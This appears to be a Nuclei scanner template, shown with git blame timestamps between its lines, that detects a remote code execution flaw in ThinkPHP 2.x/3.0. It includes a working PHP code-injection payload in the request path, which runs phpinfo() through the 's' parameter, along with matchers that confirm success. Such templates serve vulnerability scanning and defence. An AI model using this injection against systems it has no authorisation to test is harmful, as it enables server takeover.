2022-09-08 13:28:46 +00:00
id : thinkphp-2-rce
2022-04-22 10:38:41 +00:00
2022-09-08 13:28:46 +00:00
info :
2022-10-10 19:22:59 +00:00
name : ThinkPHP 2/3 - Remote Code Execution
2022-09-08 13:28:46 +00:00
author : dr_set
severity : critical
2022-10-10 19:22:59 +00:00
description : ThinkPHP 2.x and 3.0 in Lite mode are susceptible to remote code execution via the s parameter. An attacker can execute malware, obtain sensitive information, modify data, and/or gain full control over a compromised system without entering necessary credentials.
2022-09-08 13:28:46 +00:00
reference : https://github.com/vulhub/vulhub/tree/0a0bc719f9a9ad5b27854e92bc4dfa17deea25b4/thinkphp/2-rce
tags : thinkphp,rce
2023-04-28 08:11:21 +00:00
metadata :
max-request : 1
2022-04-22 10:38:41 +00:00
2023-04-27 04:28:59 +00:00
http :
2022-09-08 13:28:46 +00:00
- method : GET
path :
- "{{BaseURL}}/index.php?s=/index/index/name/$%7B@phpinfo()%7D"
matchers-condition : and
matchers :
- type : word
words :
- "PHP Extension"
- "PHP Version"
- "ThinkPHP"
condition : and
- type : status
status :
- 200
2022-10-10 19:22:59 +00:00
# Enhanced by md on 2022/10/05